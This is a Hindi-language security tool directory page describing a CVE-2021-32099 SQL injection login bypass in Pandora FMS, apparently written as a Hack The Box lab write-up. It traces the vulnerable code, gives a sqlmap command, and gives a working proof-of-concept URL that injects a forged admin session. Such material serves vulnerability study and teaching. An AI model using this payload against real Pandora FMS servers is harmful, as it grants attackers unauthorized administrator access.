Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/l3eol3eo/cve-2021-32099_sqli
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubl3eol3eo/cve-2021-32099_sqli

CVE-2021-32099_SQLi

CVE-2021-32099 SQL इंजेक्शन हमलावर को लॉगिन बायपास करने की अनुमति देता है। HTB की ओर से प्यार के साथ

रिपॉजिटरी देखें
7144 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-32099 SQLi बायपास लॉगिन

Pandora.htb पर User Flag पढ़ने की कोशिश करते समय उपयोगी

CVE-2021-32099 SQLi हमलावर को लॉगिन बायपास करने की अनुमति देता है।

लक्ष्य

एक्सप्लॉइट: Pandora FMS v7.0NG.742_FIX_PERL2020

विश्लेषण

cvedetail से पढ़ें। हम लक्ष्य का एंडपॉइंट जानते हैं: http://localhost:8000/pandora_console/include/chart_generator.php?session_id=PayloadHere => Access denied.

alt text sqlmap -r req.txt -p session_id --dbms=mysql --dbs --risk=3 --level=5

एन्यूमरेट करने के बाद, हम केवल tsessions_php टेबल पर ध्यान केंद्रित करते हैं। tssessions_php में 3 कॉलम हैं: id_session, last_active, data। (sqlmap का परिणाम गलत फॉर्मेट में है)

alt text

/include/chart_generator.php

root@kitploit:~
71  // Try to initialize session using existing php session id.
72  $user = new PandoraFMS\User(['phpsessionid' => $_REQUEST['session_id']]);
73  if (check_login(false) === false) {   
74     // Error handler.
 ⋮
96  }
97
98  // Access granted.
  • phpsessionid को session_id (PayloadHere) का मान सौंपा जाएगा

/include/lib/User.php

root@kitploit:~
60  public function __construct($data)
61  {
 ⋮
68     if (is_array($data) === true) {
69        if (isset($data['phpsessionid']) === true) {
70           $this->sessions[$data['phpsessionid']] = 1;
71           $info = \db_get_row_filter(
72              'tsessions_php',
73              ['id_session' => $data['phpsessionid']]
74          );
75
76         if ($info !== false) {
77            // Process.
78            $session_data = session_decode($info['data']);
79            $this->idUser = $_SESSION['id_usuario'];
80
81            // Valid session.
82            return $this;
83         }
  • id_session को phpsessionid का मान सौंपा जाएगा
  • सभी कोड इस क्वेरी के लिए प्रदान करेंगे: select * from tsessions_php where id_session=***PayloadHere***

/include/lib/db/mysql.php

root@kitploit:~
848  function db_get_row_filter($table, $filter, $fields=false)
849  {  
850     if (empty($fields)) {
851         $fields = '*';
852     }
 ⋮
861     $filter = db_format_array_where_clause_sql($filter, ' WHERE ');
 ⋮
868     $sql = sprintf('SELECT %s FROM %s %s', $fields, $table, $filter);

POC:

http://localhost:8000/pandora_console/include/chart_generator.php?session_id=PayloadHere%27%20union%20select%20%271%27,%272%27,%27id_usuario|s:5:%22admin%22;%27%20--%20a => Pandora FMS Graph ( - )

रीलोड करें: http://localhost:8000/pandora_console/ वेबपेज तक पहुंचने के लिए

संदर्भ:

https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained

https://portswigger.net/daily-swig/multiple-vulnerabilities-in-pandora-fms-could-trigger-remote-execution-attack

टूल डाउनलोड करें